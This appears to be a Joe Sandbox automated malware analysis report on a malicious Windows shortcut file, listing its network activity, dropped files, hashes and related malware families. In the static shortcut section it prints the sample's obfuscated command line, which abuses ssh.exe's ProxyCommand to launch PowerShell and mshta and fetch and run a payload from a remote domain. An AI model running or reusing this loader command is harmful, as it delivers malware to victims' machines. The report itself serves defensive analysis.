                              https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSmssh.exe, 00000000.00000002.3563617247.00000229B4079000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, IOnqEVA4Dz.lnktrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/mshta.exe, 00000005.00000002.3564144751.000001B5C0FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637imshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?13767556376.1mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                172.67.129.82
                                		awakka-aws3.zoho-documents.comUnited States
                                		13335CLOUDFLARENETUSfalse

                                Private

                                IP
                                127.0.0.1

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1582822
                                Start date and time:2024-12-31 15:40:23 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 36s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:IOnqEVA4Dz.lnk
                                renamed because original name is a hash value
                                Original Sample Name:c5997a14e872d97d48e1d4ea8b66910f.lnk
                                Detection:MAL
                                Classification:mal76.winLNK@9/11@1/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 5
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .lnk

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 40.126.32.140, 20.109.210.53
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target mshta.exe, PID 6464 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 5520 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:41:46API Interceptor1x Sleep call for process: mshta.exe modified
                                09:41:47API Interceptor2x Sleep call for process: svchost.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUShttps://br.custmercompa.de/Get hashmaliciousUnknownBrowse
                                • 172.67.139.222
                                tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                • 188.114.96.3
                                vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                • 104.21.85.189
                                Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                • 172.67.196.114
                                Statement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                • 162.159.61.3
                                MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                • 172.64.41.3
                                5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                • 104.21.96.1
                                zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                • 104.21.112.1
                                2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                • 104.21.64.1

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                37f463bf4616ecd445d4a1937da06e19setup.msiGet hashmaliciousUnknownBrowse
                                • 172.67.129.82
                                GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                • 172.67.129.82
                                6684V5n83w.exeGet hashmaliciousVidarBrowse
                                • 172.67.129.82
                                heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                • 172.67.129.82
                                zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                • 172.67.129.82
                                hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                • 172.67.129.82
                                Loader.exeGet hashmaliciousMeduza StealerBrowse
                                • 172.67.129.82
                                setup.msiGet hashmaliciousUnknownBrowse
                                • 172.67.129.82
                                BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                • 172.67.129.82
                                Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                • 172.67.129.82

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                Download File
                                Process:C:\Windows\System32\svchost.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):0.8307334092697921
                                Encrypted:false
                                SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugV:gJjJGtpTq2yv1AuNZRY3diu8iBVqFz
                                MD5:5AFBA68B4CC1DC976F9166F76722D412
                                SHA1:C3C1AF0F9094B4408362AC9E61DD89417FAB3CD9
                                SHA-256:1484790DC972F11F9DC22B307649F478911C5B5A9EE01FE29F81ADE456AFFF05
                                SHA-512:A43C82E93E85D7E259B7C6453B1CF89FAF5D693AC21ABDD19A2C749A58621AE97D18FDF5036342300BA4A7CC8EC18254A42BEAD820C675BC6DC536536D0DE3C9
                                Malicious:false
                                Reputation:low
                                Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                Download File
                                Process:C:\Windows\System32\svchost.exe
                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5d423fbe, page size 16384, DirtyShutdown, Windows version 10.0
                                Category:dropped
                                Size (bytes):1310720
                                Entropy (8bit):0.6586196469763912
                                Encrypted:false
                                SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                MD5:D239925ABA956C9135D554707AA852B1
                                SHA1:AC8A297524C19558752816D82AE75A84410B9F77
                                SHA-256:DB9929B847582756E386BCFF83285E62A941BA65BC21BBD9BE5D2C637455EE1B
                                SHA-512:B72C24818ECD9633C2BB261107B90C58AF7A5E3CCB6BAF5ADBF78A274BA39DC1DFF5489AB579A7B71242F8A4924B72FA63CE83A49F4F79C3D07C1E0171A9E24E
                                Malicious:false
                                Reputation:low
                                Preview:]B?.... ...............X\...;...{......................0.z..........{../)...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...................................Ww./)...|....................../)...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                Download File
                                Process:C:\Windows\System32\svchost.exe
                                File Type:SysEx File - Waldorf
                                Category:dropped
                                Size (bytes):16384
                                Entropy (8bit):0.08104037160020645
                                Encrypted:false
                                SSDEEP:3:zYe9q6pGGkGuAJkhvekl1iMkllrekGltll/SPj:zz9Berxl1sJe3l
                                MD5:3754B10FFAD812C23E92F65691D73D29
                                SHA1:A511CC8AA829EAE356BB065F4EFA7CA713444C94
                                SHA-256:F4AB531B0379DB9FC4ADE89D72EC173DD905F85905CFFD28FD3CA545B9536F5B
                                SHA-512:D56DCB666F4E5AF62206D4DB291A23969583E28073707570D9B0B41D43F8AE9CB857E0FB888C4CDB90201F5777E444D62B4A70F649742360C933D751F1160F52
                                Malicious:false
                                Reputation:low
                                Preview:.><......................................;...{../)...|.......{...............{.......{...XL......{....................../)...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cf.errors[1].css

                                Download File
                                Process:C:\Windows\System32\mshta.exe
                                File Type:ASCII text, with very long lines (24050)
                                Category:dropped
                                Size (bytes):24051
                                Entropy (8bit):4.941039417164537
                                Encrypted:false
                                SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                MD5:5E8C69A459A691B5D1B9BE442332C87D
                                SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                Malicious:false
                                Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w

                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\icon-exclamation[1].png

                                Download File
                                Process:C:\Windows\System32\mshta.exe
                                File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):7.0936408308765495
                                Encrypted:false
                                SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                MD5:C33DE66281E933259772399D10A6AFE8
                                SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                Malicious:false
                                Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.773832331134527
                                Encrypted:false
                                SSDEEP:3:Nlllulo/:NllUo/
                                MD5:E54D0B143115DA49AA5126838E7B394E
                                SHA1:F5CB59DCFB794E2B68B61F55D98A2AD0B3035C3D
                                SHA-256:1A7168DD4E695D69BBC1A590D2EC6DDCD335C968A4000734C6D9155754EC09B9
                                SHA-512:284B3E5A76AF507F423DD23CBDAFBB5DD73CBEAA4BE983B0828D1E9BBE5CAEC0C98FF46D30289CD52D0CE6B8EB9E6AD57358906F16DB0722100A8B43935C1920
                                Malicious:false
                                Preview:@...e...........................................................

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xiss0ap.nkm.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adrhsm0i.gk1.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnevcnja.2vz.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nobqeiyb.4zp.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                Download File
                                Process:C:\Windows\System32\svchost.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):55
                                Entropy (8bit):4.306461250274409
                                Encrypted:false
                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                Malicious:false
                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                Static File Info

                                General

                                File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                Entropy (8bit):2.7294806585734723
                                TrID:
                                • Windows Shortcut (20020/1) 100.00%
                                File name:IOnqEVA4Dz.lnk
                                File size:2'514 bytes
                                MD5:c5997a14e872d97d48e1d4ea8b66910f
                                SHA1:e5bc26705b9df5eadfc65ff0bb600743b4d2894d
                                SHA256:1e31450855498aa18f97e2bd1b77aa3cf652b88271502ca7ee926938c04b722f
                                SHA512:823516ffba77091d43af0a499904fc3e2fb8e62560cea050113fc7b91cebe9cceea10aeca3a8ec6459aee709b3b1282549a1401391d10fa93e49b033cf231846
                                SSDEEP:24:8lj/BF//Z/Udt1v+/+GF+WbUkT+1Z8lOxk86+vdd79dsHhWUIeFIU:81LZwGF+aUkIigdJ9Z5W
                                TLSH:295162042AFA0711F3B39E31C4BAA721843BBD06EEB19F1D004D41881727A19E976F6B
                                File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                File Icon

                                Icon Hash:72d282828e8d8dd5

                                Static Windows Shortcut Info

                                General

                                Relative Path:..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
                                Command Line Argument: -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
                                Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 15:41:46.604621887 CET49723443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:46.604671955 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:46.604852915 CET49723443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:46.618202925 CET49723443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:46.618230104 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.081646919 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.081748962 CET49723443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.131141901 CET49723443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.131177902 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.131573915 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.134720087 CET49723443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.136806965 CET49723443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.183347940 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.236494064 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.236562967 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.236607075 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.236643076 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.236752987 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.236885071 CET49723443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.239940882 CET49723443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.239969015 CET44349723172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.249716997 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.249773979 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.249866962 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.250142097 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.250157118 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.748884916 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.748986959 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.749545097 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.749557972 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.749833107 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.749839067 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.890146017 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.890199900 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.890233040 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.890252113 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.890274048 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.890296936 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.890320063 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.890335083 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.890342951 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.890372038 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.890396118 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.890496016 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.890544891 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.890552044 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.890595913 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.891187906 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.891239882 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.894865036 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.894911051 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.894967079 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.895000935 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.895015001 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.895091057 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.895154953 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.895204067 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.980947971 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.981013060 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.981017113 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.981029987 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.981056929 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.981090069 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.981103897 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.981141090 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.981147051 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.981156111 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.981184959 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.981209993 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.981215000 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.981246948 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:47.981254101 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.981303930 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.981580973 CET49726443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:47.981597900 CET44349726172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:48.056447029 CET49727443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:48.056508064 CET44349727172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:48.056587934 CET49727443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:48.057019949 CET49727443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:48.057032108 CET44349727172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:48.535509109 CET44349727172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:48.535608053 CET49727443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:48.536084890 CET49727443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:48.536091089 CET44349727172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:48.536334991 CET49727443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:48.536340952 CET44349727172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:48.651690960 CET44349727172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:48.651762009 CET44349727172.67.129.82192.168.2.5
                                Dec 31, 2024 15:41:48.651772976 CET49727443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:48.651844025 CET49727443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:48.652921915 CET49727443192.168.2.5172.67.129.82
                                Dec 31, 2024 15:41:48.652936935 CET44349727172.67.129.82192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 15:41:46.559809923 CET5604053192.168.2.51.1.1.1
                                Dec 31, 2024 15:41:46.573206902 CET53560401.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 31, 2024 15:41:46.559809923 CET192.168.2.51.1.1.10xabe8Standard query (0)awakka-aws3.zoho-documents.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 31, 2024 15:41:46.573206902 CET1.1.1.1192.168.2.50xabe8No error (0)awakka-aws3.zoho-documents.com172.67.129.82A (IP address)IN (0x0001)false
                                Dec 31, 2024 15:41:46.573206902 CET1.1.1.1192.168.2.50xabe8No error (0)awakka-aws3.zoho-documents.com104.21.2.148A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • awakka-aws3.zoho-documents.com
                                • https:

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549723172.67.129.824436464C:\Windows\System32\mshta.exe
                                TimestampBytes transferredDirectionData
                                2024-12-31 14:41:47 UTC343OUTGET /hekko.mp4 HTTP/1.1
                                Accept: */*
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
